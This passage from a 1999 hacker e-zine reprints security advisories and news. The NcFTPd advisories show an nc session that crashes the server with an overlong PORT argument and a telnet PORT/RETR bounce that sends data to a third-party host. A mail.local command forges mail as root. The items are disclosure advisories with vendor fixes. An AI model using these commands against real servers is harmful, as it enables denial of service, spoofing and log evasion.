  1513.            Disable talkback. You may do this my executing the following commands
  1514.            (your path to netscape may differ):
  1515.        
  1516.        
  1517.                /bin/mv /opt/netscape/talkback /opt/netscape/talkback.disable
  1518.        
  1519.        
  1520.        /bin/chmod -R 600 /opt/netscape/talkback
  1521.        
  1522.        
  1523.            Netscape responded to this vulnerability that the current version
  1524.            does not install the talkback application. You may install the new
  1525.            version 4.51 from Netscape which also fixes some other security
  1526.            vulnerabilities. However, if you update from a 4.5 installation, ensure
  1527.            that you execute the lines above.
  1528.        
  1529.        
  1530.        ______________________________________________________________________________
  1531.        
  1532.        
  1533.        SuSE has got two free security mailing list services to which any
  1534.        interested party may subscribe:
  1535.        
  1536.        
  1537.        suse-security@suse.com          - unmoderated and for general/linux/SuSE
  1538.                                          security discussions. All SuSE security
  1539.                                          announcements are send to this list.
  1540.        
  1541.        
  1542.        suse-security-announce@suse.com - SuSE's announce-only mailing list.
  1543.                                          Only SuSE's security annoucements are sent
  1544.                                          to this list.
  1545.        
  1546.        
  1547.        To subscribe, send an email to majordomo@suse.com with the text
  1548.        
  1549.        
  1550.                subscribe suse-security
  1551.        or
  1552.                subscribe suse-security-announce
  1553.        
  1554.        
  1555.        in the body of the message. Or just issue a
  1556.        
  1557.        
  1558.                echo subscribe suse-security | mail majordomo@suse.com
  1559.        or
  1560.                echo subscribe suse-security-announce | mail majordomo@suse.com
  1561.        
  1562.        
  1563.        ______________________________________________________________________________
  1564.        
  1565.        
  1566.        If you want to report *NEW* security bugs in the SuSE Linux Distribution
  1567.        please send an email to security@suse.de or call our support line.
  1568.        You may use pgp with the public key below to ensure confidentiality.
  1569.        ______________________________________________________________________________
  1570.        
  1571.        
  1572.          This information is provided freely to everyone interested and may
  1573.          be redistributed provided that it is not altered in any way.
  1574.        
  1575.        
  1576.        Type Bits/KeyID    Date       User ID
  1577.        pub  2048/3D25D3D9 1999/03/06 SuSE Security Team <security@suse.de>
  1578.        
  1579.        
  1580.        -----BEGIN PGP PUBLIC KEY BLOCK-----
  1581.        Version: 2.6.3i
  1582.        <SNIP>
  1583.        
  1584.        -----END PGP PUBLIC KEY BLOCK-----
  1585.  
  1586.        @HWA
  1587.        
  1588.  09.0  Hotmail to plug potential security problem
  1589.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1590.        
  1591.        HOTMAIL BUG
  1592.        by BHZ, Sunday 21th Mar 1999 on 3:01 am CET
  1593.        The security hole, that Hotmail plans to plug, could make users who access Hotmail
  1594.        through a public terminal or other shared computer vulnerable to the prying eyes of
  1595.        subsequent users. Hotmail said it had caught the security problem during a routine
  1596.        security audit and was close to implementing its fix, which is to stop authentication
  1597.        by IP address and require the use of cookies. The service noted that users currently
  1598.        can protect themselves against the exploit by opting for cookie-based authentication.
  1599.        Contributed by Thejian.
  1600.        
  1601.        @HWA
  1602.        
  1603.  10.0  NcFTPd Exploit (old but missed in earlier issues)
  1604.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1605.  
  1606.        This advisory is from Proof Of Concept
  1607.  
  1608.        Proof of Concept - Security Advisory                        02/23/99
  1609.        http://poc.csoft.net                                     Released by
  1610.        poc@csoft.net                                    sw3wn@poc.csoft.net
  1611.        
  1612.        ---
  1613.        
  1614.        Affected Program        NcFTPd <http://www.ncftp.com>
  1615.        Description             FTP server (commercial)
  1616.        Severity                Theoretical root compromise, logs compromise
  1617.        
  1618.        
  1619.        Synopsis:
  1620.        
  1621.        NcFTPd is a commercial FTP (File Transfer Protocol) server, in the
  1622.        NcFTP product line.  The source code is not publicly released.  This
  1623.        was tested on Linux with libc5 (there's a glibc2 specific version
  1624.        available).
  1625.        
  1626.        Problem:
  1627.        
  1628.        NcFTPd's PORT parsing function has a stack buffer overflow
  1629.        problem, which would basically allow a user to remotely execute
  1630.        arbitrary code - the thing here is that the PORT parsing function
  1631.        seem to change characters, that are not in the range 0x30-0x39
  1632.        (ASCII '0'-'9'), into 0x20 (ASCII space), hence making an exploit
  1633.        almost impossible (note that, if ascii 0x40 would be allowed that
  1634.        would be a different story =p).
  1635.        
  1636.        The program only parses for characters out of the 0-9 range in a
  1637.        specific area in memory (the one that contains return address heh)
  1638.        - the rest is kept unchanged, and you can't really go further in
  1639.        memory, input line size is restricted.
  1640.        
  1641.        Like with most buffer overflows there are probably work-arounds to
  1642.        exploit it - this could have been a particulary neat exploit, since
  1643.        it runs as a child and one could gain access transparently without
  1644.        crashing the parent.
  1645.        
  1646.        The current bug is not really a problem, it can crash the child process
  1647.        with a segfault, the parent process receives a signal 6 (abort) and the
  1648.        child process stay zombie for a few seconds and a brand new one is created.
  1649.        A few minor DoS attacks are possible but, who cares.  Oh and this could be
  1650.        used to not get listed in the logs too.
  1651.        
  1652.        Example:
  1653.        
  1654.        --
  1655.        evil:$ nc victim ftp
  1656.        220 victim NcFTPd Server (unregistered copy) ready.
  1657.        user anonymous
  1658.        331 Guest login ok, send your complete e-mail address as password.
  1659.        pass some@thing
  1660.        230-You are user #1 of 50 simultaneous users allowed.
  1661.        230-
  1662.        230 Logged in anonymously.
  1663.        port 00000000000000000000000000000000000000000000 (...)
  1664.        501 Syntax error in parameters.
  1665.        evil:$
  1666.        --
  1667.        
  1668.        
  1669.        Status:
  1670.        
  1671.        I contacted the authors, nice enough to send me back the piece
  1672.        of code that causes the problem - here goes:
  1673.        
  1674.        static int
  1675.        ftp_aton(const char *cp, struct sockaddr_in *sinaddr)
  1676.        {
  1677.                char buf[64];
  1678.                char *dst;
  1679.                char *dstlim;
  1680.                int i, c;
  1681.                unsigned int octets[6], u;
  1682.        
  1683.                memset(sinaddr, 0, sizeof(struct sockaddr_in));
  1684.                dst = buf;
  1685.                dstlim = dst + sizeof(buf);
  1686.        
  1687.                for ( ; ; ) {
  1688.                        c = *cp++;
  1689.                        if (c == '\0')
  1690.                                break;
  1691.                        if (! isdigit(c))
  1692.                                c = ' ';
  1693.                        if (dst < dstlim)
  1694.                                *dst++ = c;
  1695.                }
  1696.                *dst = '\0';
  1697.        
  1698.                if (sscanf(buf, "%u%u%u%u%u%u",
  1699.                        &octets[0],
  1700.                        &octets[1],
  1701.                        &octets[2],
  1702.                        &octets[3],
  1703.                        &octets[4],
  1704.                        &octets[5]
  1705.                ) != 6) {
  1706.                        return (-1);
  1707.                }
  1708.        
  1709.                for (i=0; i<6; i++) {
  1710.                        if (octets[i] > 0xFF)
  1711.                                return (-1);
  1712.                }
  1713.        
  1714.                sinaddr->sin_family = AF_INET;
  1715.                u = (octets[0] << 24)
  1716.                        | (octets[1] << 16)
  1717.                        | (octets[2] << 8)
  1718.                        | (octets[3]);
  1719.                sinaddr->sin_addr.s_addr = htonl(u);
  1720.                u = (octets[4] << 8) | (octets[5]);
  1721.                sinaddr->sin_port = htons((unsigned short) u);
  1722.                return (0);
  1723.        }       /* ftp_aton */
  1724.        
  1725.        
  1726.        void
  1727.        Port(char *line)
  1728.        {
  1729.                 if (gLoggedIn == 0) {
  1730.                        NotLoggedIn();
  1731.                        return;
  1732.                }
  1733.                if (gAllowPORT == 0) {
  1734.                        Reply("550 This site does not permit PORT.  Please use PASV
  1735.        instead.\r\n");
  1736.                        return;
  1737.                }
  1738.        
  1739.                if (ftp_aton(line, &gRemoteDataAddr) < 0) {
  1740.                        Reply("501 Syntax error in parameters.\r\n");
  1741.                        return;
  1742.                }
  1743.                /* ... */
  1744.        }
  1745.        
  1746.        
  1747.        @HWA
  1748.  
  1749.  10.1  NcFTPd proxy exploitation
  1750.        ~~~~~~~~~~~~~~~~~~~~~~~~~
  1751.  
  1752.  
  1753.        Proof of Concept - Security Advisory                        02/16/99
  1754.        http://poc.csoft.net                                     Released by
  1755.        poc@csoft.net                                    sw3wn@poc.csoft.net
  1756.        
  1757.        ---
  1758.        
  1759.        Affected Program        NcFTPd <http://www.ncftp.com>
  1760.        Description             FTP server (commercial)
  1761.        Severity                Default PORT setup, log compromise
  1762.        
  1763.        
  1764.        Synopsis:
  1765.        
  1766.        NcFTPd is a commercial FTP (File Transfer Protocol) server, in the
  1767.        NcFTP product line.  The source code is not publicly released.  This
  1768.        was tested on Linux with libc5 (there's a glibc2 specific version
  1769.        available).
  1770.        
  1771.        Overview:
  1772.        
  1773.        To initiate a FTP transfer, there must be two connections, one
  1774.        control connection (server's ftp port), and one data connection.
  1775.        When a client wants to tell the server where to send the data (ie.
  1776.        a file you want to download, or a directory listing), it must use
  1777.        the command PORT - in which the destination address and port is
  1778.        specified.
  1779.        
  1780.        Problem:
  1781.        
  1782.        NcFTPd does not check that the destination PORT address is the
  1783.        user's IP.  This means anybody can transmit data from the server
  1784.        anywhere, anonymously.  Obviously this can lead to potential
  1785.        `easy' DoS attacks and spoofing (say, someone uploads a file
  1786.        containing commands of something to incoming, PORT to some host/port,
  1787.        and use RETR (retrieve file)).  Such connections are possible
  1788.        with the default NcFTPd configuration, but can be disallowed:
  1789.        general.cf> allow-outgoing-proxy-data-connection-ports-below-1024 - no
  1790.        general.cf> allow-proxy-connections - no
  1791.        
  1792.        Most other FTP server daemons I've tried has this feature
  1793.        disabled - even if the proxy connections are a documented part of
  1794.        RFC 959 (FTP protocol).  But this is no big deal, just a possible
  1795.        amelioration.
  1796.        
  1797.        I made an example program that listens on a port and dumps
  1798.        arbitrary received data in string, hex or ascii/hex format,
  1799.        and sends back EOF (needed for FTP data transfer).
  1800.         [http://poc.csoft.net/code/listerine/listerine.tar.gz]
  1801.        
  1802.        Example:
  1803.        
  1804.        evil:$ telnet victim ftp                # victim runs NcFTPd
  1805.        user anonymous                          # anonymous is up by default
  1806.        pass some@thing
  1807.        port 192,168,0,1,5,131                  # connect on port 1411
  1808.        retr incoming/stuff                     # send arbitrary data, as it
  1809.                                                # was coming from host victim.
  1810.        
  1811.        To see for yourself, you can run my example program `listerine', on
  1812.        the host victim.  I tested this on my LAN and on remote machines too.
  1813.        
  1814.        
  1815.        Status:
  1816.        
  1817.        Got response from authors, the problem can be fixed indeed with
  1818.        the general.cf options mentionned above, but are not enabled with
  1819.        default configuration.
  1820.        
  1821.        .sw3
  1822.        
  1823.        @HWA
  1824.  
  1825.  
  1826.  10.2  Mail.local sendmail exploit advisory
  1827.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1828.  
  1829.        
  1830.        Proof of Concept - Security Mini-advisory                   02/15/99
  1831.        http://poc.csoft.net                                     Released by
  1832.        poc@csoft.net                                    sw3wn@poc.csoft.net
  1833.        
  1834.        ---
  1835.        
  1836.        Affected Program        mail.local (Berkeley Sendmail)
  1837.        Description             Local mailer (forward mail to mailboxes)
  1838.        Severity                Mailbox compromise
  1839.        
  1840.        
  1841.        Synopsis:
  1842.        
  1843.        mail.local is a small program distributed with Berkeley Sendmail,
  1844.        used as a local mailer (forwards mail to mailboxes), also able to
  1845.        handle LMTP commands.  It runs SUID root in order to access the
  1846.        users's mailbox (ie. /var/spool/mail, /usr/spool/mail).
  1847.        
  1848.        Overview:
  1849.        
  1850.        When mail has to be written to a user's mailbox locally, a local
  1851.        mailer is used; the mail.local program that comes with Sendmail
  1852.        does this task, but does not restrict the length of a message, or
  1853.        does not check the authenticity of the user who sends it.
  1854.        
  1855.        This is obviously not a big security issue - but still, it has to
  1856.        get fixed, as this could lead to more serious problem if used
  1857.        on a system with lots of e-mail accounts.
  1858.        
  1859.        Problem:
  1860.        
  1861.        This can lead to the compromising of anybody's mailbox - from fake
  1862.        (and totally untraceable messages), to flooding the mailbox (and
  1863.        maybe the hard drive).  I found this by inspecting the source code for
  1864.        buffer overflows heh.
  1865.        
  1866.        Say I wanted to send a fake message like it was coming from root
  1867.        to user joe, simply running
  1868.           mail.local -f root joe
  1869.           <message+eof>
  1870.        could do it.  mail.local simply dumps the message as you enter
  1871.        it in the user's maibox.
  1872.        
  1873.        Since mail.local does not checks for message length, you can
  1874.        flood a mailbox (and possibly the hard drive) in a matter of seconds.
  1875.        
  1876.        Finally, mail.local only check if a user exists by using /etc/passwd,
  1877.        that means anybody could create mailboxes for users like bin, nobody,
  1878.        etc (usually it's no security compromise).
  1879.        
  1880.        Examples:
  1881.         [http://poc.csoft.net/advs/mail.local/mailfrm.tar.gz]
  1882.         [http://poc.csoft.net/advs/mail.local/junk.tar.gz]
  1883.        
  1884.        Patch/Fix:
  1885.         [http://poc.csoft.net/advs/mail.local/mail.local.diff]
  1886.        
  1887.        Status:
  1888.        
  1889.        As of 02/22/99, I received a e-mail from the authors, the program
  1890.        should be shipped non-setuid in 8.10.
  1891.        
  1892.        .sw3
  1893.        
  1894.        @HWA
  1895.        
  1896.  11.0  Its in the bag, the great hacker backpack caper...
  1897.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1898.        
  1899.        
  1900.        I really debated giving this any space at all but it is pertinent
  1901.        to the mainstream ideals that are being generated by the media
  1902.        so its here.... *sigh*  - Ed
  1903.        
  1904.        
  1905.        
  1906.        
  1907.        March 24th 1999 via wired news
  1908.        
  1909.        Hackers Sack Competition Site
  1910.        by Leander Kahney 
  1911.  
  1912.        5:00 p.m.  23.Mar.99.PST
  1913.        Having baited crackers with a "hacking" competition to win a 
  1914.        backpack, a retailer's site has been hacked for real. <sic>
  1915.  
  1916.        As previously reported, a Belgian bag manufacturer is giving a
  1917.        "Hacker" branded backpack to everyone that cracks a password 
  1918.        competition on its Web site. 
  1919.  
  1920.        But on Tuesday Kipling's site was hacked for real. 
  1921.  
  1922.        The opening page was replaced with a screen grab that showed a
  1923.        big red cross  and the message: "Sorry, we've been hacked.... 
  1924.        Site under reconstruction." 
  1925.  
  1926.        The altered page stayed up for most of Tuesday, and Kipling was
  1927.        unavailable for comment. <sic>
  1928.  
  1929.        The site intrusion may have been retaliation for disparaging remarks 
  1930.        made about crackers by a Kipling vice president. 
  1931.  
  1932.        Shortly before the site was hacked, the password competition was 
  1933.        finally cracked. It took a week of trying, claimed Mooby,
  1934.        a hacker who organized a brute force method of using software to 
  1935.        generate all possible combinations. 
  1936.  
  1937.        The crackers' efforts finally paid off over the weekend, Mooby said 
  1938.        in an email. 
  1939.  
  1940.        Ironically, the password wasn't cracked by software, but obtained by
  1941.        a more traditional method -- weaseling it out of someone. 
  1942.  
  1943.        "It's a pity that I can't tell how I got the final password/login," 
  1944.        he wrote. "We never would have guessed [it]. Let's just say I used 
  1945.        some of my nerd-heroic social skills to get the right things." 
  1946.  
  1947.        Having obtained the password, Mooby shared it. 
  1948.  
  1949.        "I hope Kipling sends me this backpack," he wrote, "and all the 
  1950.        other 99 people I told the password." 
  1951.        
  1952.        -=-
  1953.        
  1954.                                                                      -=-
  1955.        
  1956.        Date: Sat, 20 Mar 1999 05:20:50 -0700 (MST) 
  1957.        From: mea culpa <jericho@dimensional.com> 
  1958.        To: InfoSec News <isn@repsec.com> 
  1959.        Subject: [ISN] Retailer Frustrates Hackers 
  1960.        
  1961.        
  1962.        http://www.wired.com/news/news/culture/story/18616.html
  1963.        
  1964.        
  1965.        Retailer Frustrates Hackers
  1966.        by Leander Kahney 
  1967.        3:00 a.m.  20.Mar.99.PST
  1968.        
  1969.        
  1970.        Promoting a new line of backpacks aimed at "hackers," a European bag
  1971.        manufacturer is running a crack-the-password competition on its Web site. 
  1972.        
  1973.        
  1974.        But to the fury of hackers trying to bypass the competition and crack the
  1975.        site in earnest, all attempts to date have been unsuccessful. 
  1976.        
  1977.        
  1978.        According to an amusing line of posts to Slashdot, an information
  1979.        clearinghouse for computer nerds, the hackers reveal their mounting
  1980.        frustration at being unable to thwart the password competition. 
  1981.        
  1982.        
  1983.        "Come on!" wrote one. "Out of the 10,000 people who have read this
  1984.        article, no one has found the username and password? I find that very hard
  1985.        to believe. It has to be something completely insanely easy, right?" 
  1986.        
  1987.        
  1988.        Apparently not. 
  1989.        
  1990.        
  1991.        The "crack and win" password competition is organized by Kipling, a
  1992.        manufacturer of travel bags, backpacks, and accessories based in Antwerp,
  1993.        Belgium. The competition promotes its Hacker line of bags and backpacks,
  1994.        which have names like bookmark, mailbomb, browser, spam, firewall, and
  1995.        download. 
  1996.        
  1997.        
  1998.        "The game challenges every pirate out there to break into our security and
  1999.        win a Hacker bag," the company said in a press release. 
  2000.        
  2001.        
  2002.        "You can find the code in two ways," the release continued. "Real computer
  2003.        freaks will find the information in the traditional hacker manner. Those
  2004.        with less hacking experience can follow the hints which appear on the
  2005.        screen, which refer surfers to a Kipling sales point. Those who remain
  2006.        alert will surely find the letter/number code." 
  2007.        
  2008.        
  2009.        Kipling confirmed it would give a bag to everyone who cracks the code,
  2010.        which takes the form of a username login and password. 
  2011.        
  2012.        
  2013.        Rising to the challenge, readers of Slashdot quickly encouraged each other
  2014.        to break the code, just for the hell of it. But after a week of trying,
  2015.        most efforts have been abandoned. 
  2016.        
  2017.        
  2018.        "I'm sorry to say that so far no one has been able to beat the login,"
  2019.        said Slashdot contributor Greg Boyce, who offered to buy a Slashdot hat
  2020.        for the first person to crack it. "Turns out it was a bit more complicated
  2021.        than I thought it would be." 
  2022.        
  2023.        
  2024.        The most ambitious attempt adopted a "brute force" strategy generating all
  2025.        possible combinations of username and password. Special software to
  2026.        automate the process is available on the Web. 
  2027.        
  2028.        
  2029.        Other attempts ranged from examining the source code for the Web page,
  2030.        which is coded in Javascript, to breaking into the site. 
  2031.        
  2032.        
  2033.        However, Kipling said attempts to breach the site's security have so far
  2034.        failed. 
  2035.        
  2036.        
  2037.        "No one has cracked it," said Edith Iris, Kipling's marketing manager.
  2038.        "We've had no problems." 
  2039.        
  2040.        
  2041.        To add to the hackers' irritation, Kipling also garbled the definitions of
  2042.        cherished computer terms in its marketing blurb. 
  2043.        
  2044.        
  2045.        According to Kipling's site, "A hacker is a cunning computer expert who
  2046.        cracks the security systems of computers in order to steal or destroy
  2047.        information." 
  2048.        
  2049.        
  2050.        But in the programming community, a malicious computer expert is called a
  2051.        "cracker." A hacker is simply a harmless programmer. 
  2052.        
  2053.        
  2054.        "Hacker is the term in common parlance," countered Larry Lein, executive
  2055.        vice president of Kipling USA. "If you asked me what a cracker was, I'd
  2056.        say someone who lived in a trailer park down South." 
  2057.        
  2058.        
  2059.        
  2060.        -o-
  2061.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  2062.        Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
  2063.        
  2064.        @HWA
  2065.        
  2066.        
  2067.        
  2068.  12.0  DNS Spoofing finally resolved?
  2069.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2070.        
  2071.        Date: Sat, 20 Mar 1999 22:08:46 -0700 (MST) 
  2072.        From: mea culpa <jericho@dimensional.com> 
  2073.        To: InfoSec News <isn@repsec.com> 
  2074.        Subject: [ISN] bind with DNSSEC finally released 
  2075.        Sender: owner-isn@repsec.com 
  2076.               
  2077.        
  2078.        Originally From: Lucky Green <shamrock@netcom.com>
  2079.        Originally To: cypherpunks@algebra.com
  2080.        
  2081.        
  2082.        Seems bind 8.2 with the long-awaited secure DNS fully integrated has finally
  2083.        been released. Say goodbye to DNS spoofing. Since the included crypto is
  2084.        meant to be used for authentication only and the licensing agreement
  2085.        prohibits the use of the said crypto for non-authentication purposes, the
  2086.        distribution is freely exportable. :-)
  2087.        
  2088.        
  2089.        Install bind 8.2 on your DNS server today and permanently fix one of the
  2090.        largest and longest-standing security holes on the Internet.
  2091.        
  2092.        
  2093.        ftp://ftp.isc.org/isc/bind/src/8.2/
  2094.        
  2095.        
  2096.        --Lucky Green <shamrock@netcom.com>
  2097.          PGP 5.x  encrypted email preferred
  2098.        
  2099.        
  2100.        
  2101.        -o-
  2102.        Subscribe: mail majordomo@repsec.com with "subscribe isn".
  2103.        Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
  2104.        
  2105.        
  2106.        @HWA
  2107.        
  2108.  13.0  [ISN] IETF working group  seeks to improve security alerting 
  2109.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2110.        
  2111.        Date: Thu, 18 Mar 1999 00:33:31 -0700 (MST) 
  2112.        From: mea culpa <jericho@dimensional.com> 
  2113.        To: InfoSec News <isn@repsec.com> 
  2114.        Subject: [ISN] IETF working group  seeks to improve security alerting 
  2115.               
  2116.        
  2117.        Forwarded From: darek milewski <darekm@cmeasures.com>
  2118.        
  2119.        
  2120.        http://www2.nwfusion.com:8001/cgi-bin/print.cgi?article=http://www.nwfusion.com/news/1999/0316security.html
  2121.        
  2122.        
  2123.        Sound the alarm!
  2124.        IETF working group seeks to improve security alerting.
  2125.        By Sandra Gittlen
  2126.        Network World Fusion, 03/16/99
  2127.        
  2128.        
  2129.        MINNEAPOLIS - An IETF working group has stepped up work on a protocol for
  2130.        broadcasting alerts of network breaches across proprietary security
  2131.        applications. 
  2132.        
  2133.        
  2134.        The Intrusion Detection Message Exchange Protocol (IDMEP) would let
  2135.        applications - and system managers - quickly share information about
  2136.        attacks, according to IDMEP working group members.  They are meeting here
  2137.        as part of an overall IETF conference. 
  2138.        
  2139.        
  2140.        "[IDMEP] will be useful for attacks launched from one domain to another," 
  2141.        says working group attendee Brian Tung, a computer scientist at the
  2142.        University of Southern California's Information Sciences Institute. "If a
  2143.        source domain notices an attack, it can notify the destination network. 
  2144.        Right now, that's done by a human." 
  2145.        
  2146.        
  2147.        The group had met last year at the IETF meeting in Orlando, but was
  2148.        unsuccessful in gaining consensus and had to revamp its plans. This time,
  2149.        meeting attendees seemed encouraged by the group's efforts. 
  2150.        
  2151.        
  2152.        With the protocol, which could be based on SNMP Version 3, an alert
  2153.        detailing the type of attack in progress will be automatically sent across
  2154.        the network, along with a reference, such as a URL or a system file, where
  2155.        the network manager can find further information.  That information could
  2156.        be the threshold setting of the alerter's system letting the recipient
  2157.        know what the alerter considers an attack or what the alerter suggests as
  2158.        a response for such an attack. 
  2159.        
  2160.        
  2161.        Mark Wood, product line manager at Internet Security Systems in Atlanta,
  2162.        says IDMEP could dramatically improve responses to attacks because
  2163.        networks will be sharing information, not duplicating efforts. 
  2164.        
  2165.        
  2166.        In fact, Tung says that hooking the IDMEP to policy networks could let
  2167.        users set up automatic responses to alerts and, therefore, ward them off. 
  2168.        
  2169.        
  2170.        "There are a number of dollars to be had in [the intrusion detection
  2171.        tools] market," says Stuart Staniford-Chen, co-chair of the working group.
  2172.        In fact, the projected market for intrusion detection tools is expected to
  2173.        be $200 million, according to analysts at the Aberdeen Group, a Boston
  2174.        consultancy. "Therefore, we need to get moving on this [protocol]." 
  2175.        
  2176.        
  2177.        Wood says he expects the protocol to be completed by the middle of next
  2178.        year, but products based on a proposed standard could be released as early
  2179.        as the first quarter of next year. Cisco and Axent are also working on the
  2180.        protocol. 
  2181.        
  2182.        
  2183.        @HWA
  2184.   
  2185.  14.0  Report: Military computers vulnerable
  2186.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2187.  
  2188.  
  2189.  
  2190.        
  2191.        http://www.usatoday.com/life/cyber/tech/cte684.htm
  2192.        
  2193.        
  2194.        Report: Military computers vulnerable
  2195.        WASHINGTON (AP) - The military's key communications 
  2196.        infrastructure linking combat, intelligence and command 
  2197.        forces is dangerously vulnerable to attacks from cyberspace 
  2198.        and requires urgent changes in Defense Department policy, 
  2199.        said a study released Monday. 
  2200.        
  2201.        
  2202.        The Command, Control, Communications, Computers and 
  2203.        Intelligence systems, known as C4I, is compromised by 
  2204.        security problems and also by a military culture prone to 
  2205.        treating such problems as a lesser priority, the National 
  2206.        Research Council reported.
  2207.        
  2208.        
  2209.        ''The rate at which information systems are being relied on 
  2210.        outstrips the rate at which they are being protected,'' it 
  2211.        said. ''The time needed to develop and deploy effective 
  2212.        defenses in cyberspace is much longer than the time 
  2213.        required to develop and mount an attack.'' 
  2214.        
  2215.        
  2216.        Despite evidence of security lapses in C4I -- which handles 
  2217.        communications and warning tasks all along the chain of 
  2218.        command -- the Pentagon's ''words regarding the importance 
  2219.        of information systems security have not been matched by 
  2220.        comparable action,'' the report said. 
  2221.        
  2222.        
  2223.        ''Troops in the field did not appear to take the protection 
  2224.        of their C4I systems nearly as seriously as they do other 
  2225.        aspects of defense,'' said the report, which Congress 
  2226.        ordered the Pentagon to commission in 1995. The council is 
  2227.        an independent organization chartered by Congress to advise 
  2228.        the government. 
  2229.        
  2230.        
  2231.        The report indicated the problems were due more to the 
  2232.        Pentagon's management of the systems than to the technology 
  2233.        itself. It cited C4I workers' lack of stature compared with 
  2234.        traditional combat forces, compatibility problems between 
  2235.        the services and a need for more budget flexibility on the 
  2236.        matter from both the Defense Department and Congress. 
  2237.        
  2238.        
  2239.        In a statement, the Pentagon acknowledged that the U.S. 
  2240.        military's strength ''is our information technology,'' and 
  2241.        that ''our dependence on such assets, which may be subject 
  2242.        to malicious attack, makes information technology our 
  2243.        weakness as well.'' 
  2244.        
  2245.        
  2246.        It said that as the council's report was being prepared, 
  2247.        the Defense Department had already improved protection 
  2248.        against computer attack by implementing new programs, 
  2249.        establishing a joint task force for computer defense and 
  2250.        expanding training of its information technology personnel. 
  2251.        
  2252.        
  2253.        But Kenneth Allard, an analyst who has written about C4I, 
  2254.        said its weaknesses are in part the fault of ''Industrial 
  2255.        Age'' military acquisition policies -- applying to 
  2256.        computers as well as tanks, ships and aircraft -- that give 
  2257.        the services their own procurement duties. 
  2258.        
  2259.        
  2260.        Ships and tanks may perform different tasks, he said, but 
  2261.        the Army, Navy and other services need a single-standard 
  2262.        computer system. 
  2263.        
  2264.        
  2265.        ''Twenty-first century combat is the war of the databases, 
  2266.        in which information flows must go from the foxhole to the 
  2267.        White House and back down again,'' said Allard, a former 
  2268.        Army colonel and analyst at the Center for Strategic and 
  2269.        International Studies who had not yet read the council's 
  2270.        report. 
  2271.        
  2272.        
  2273.        The report recommended: 
  2274.        
  2275.        
  2276.        Making C4I a greater budget priority in defense spending, 
  2277.        with a flexibility that can ''exploit unanticipated 
  2278.        advances in C4I technology.'' 
  2279.        Designating an organization responsible for providing 
  2280.        direct defensive operational support to commanders. 
  2281.        Funding a program to conduct frequent, unannounced 
  2282.        penetration testing of C4I systems. 
  2283.        Ensuring that programs are operable even if one part has 
  2284.        been penetrated by an adversary. 
  2285.        Emphasizing the importance of information technology in the 
  2286.        military leadership. 
  2287.        Establishing an Institute for Military Information 
  2288.        Technology, possibly as part of an existing body. 
  2289.        
  2290.        
  2291.        ------------------------------------------------------------
  2292.        --------------------
  2293.        
  2294.        
  2295.        
  2296.        ShadowVrai
  2297.        http://shadowvrai.evil.nu
  2298.        ______________________
  2299.        
  2300.        
  2301.        "Did you really think you could call up the devil and ask him to behave?"
  2302.        __________
  2303.        
  2304.        
  2305.        _____________________________________________
  2306.        Get your free personalized email address at
  2307.        http://www.MyOwnEmail.com
  2308.        
  2309.        
  2310.        @HWA
  2311.        
  2312.  15.0  International raid cracks child porn ring 
  2313.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2314.        
  2315.        http://www.cnn.com/TECH/computing/9903/19/germany.porno.reut/index.html
  2316.        
  2317.        International raid cracks child porn ring 
  2318.  
  2319.        March 19, 1999
  2320.        Web posted at: 5:35 p.m. EST (2235
  2321.        GMT)
  2322.  
  2323.        MUNICH (Reuters) -- German
  2324.        police said on Friday they had
  2325.        cracked an international Internet
  2326.        child pornography ring after
  2327.        launching a coordinated sweep
  2328.        through seven countries. 
  2329.  
  2330.        In a raid of private homes coordinated from Munich, German police said
  2331.        they had confiscated thousands of outlawed photographs and video images
  2332.        which had been traded and distributed via Internet "chat rooms." 
  2333.  
  2334.        German police said the action, codenamed "Bavaria," had taken place on
  2335.        Wednesday and involved simultaneous raids of suspects' homes in Germany,
  2336.        Switzerland, Sweden, Britain, Norway, the United States and Canada. 
  2337.  
  2338.        Holger Kind, an official from the Federal Crime Office, said the material
  2339.        uncovered had been the widest sweep of its kind led from Germany. 
  2340.  
  2341.        "You can assume this will not be the last raid of its kind," Kind told a news
  2342.        conference. 
  2343.  
  2344.        Kind said some suspects had already confessed to involvement in the ring. If
  2345.        convicted in Germany, the suspects could face a prison sentence of up to
  2346.        five years in jail. Switzerland and Britain have arrested one suspect each. 
  2347.  
  2348.        Police in Sweden and the United States also found banned material in the
  2349.        raids featuring children between the ages of three and four, police in Bavaria
  2350.        said. 
  2351.         
  2352.        @HWA
  2353.        
  2354.        
  2355.  15.1  ACPM : Anti-Child Porn Militia wants YOU
  2356.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2357.        Anti Child Porn Militia 
  2358.        contributed by system.administrator 
  2359.        The Anti Child Porn Militia is recruiting new members.
  2360.        They are asking for anyone who thinks they can be of
  2361.        assistance in eliminating child pornography from the
  2362.        internet to assist them. 
  2363.        
  2364.        http://infovlad.net/ACPM/
  2365.        
  2366.        From the ACPM site;
  2367.        
  2368.          We pray for children who are sick. children who
  2369.          may not live to see their next birthday.... or
  2370.          tomorrow, children who go into hospitals, never to
  2371.          come out children who don't deserve to die. We
  2372.          pray for the children that don't understand why......
  2373.          why they're not like other children who are healthy
  2374.          children who play in the sunlight dance on the
  2375.          grass, children who enjoy life children that don't
  2376.          think about death.
  2377.          We pray for children who stare at photographers
  2378.          from behind barbed wire, who can't run down the
  2379.          street in a new pair of sneakers, who are born in
  2380.          places we wouldn't be caught dead in, who live in
  2381.          an X-rated world.
  2382.          We pray for those children who never get dessert,
  2383.          who have no security blanket to drag behind them,
  2384.          children who watch their parents watch them die.
  2385.          children who can't find any bread to steal, children
  2386.          who don't have any rooms to clean up, whose
  2387.          pictures aren't on anybody's dresser, whose
  2388.          monsters are real.
  2389.          We pray for children whose nightmares come in
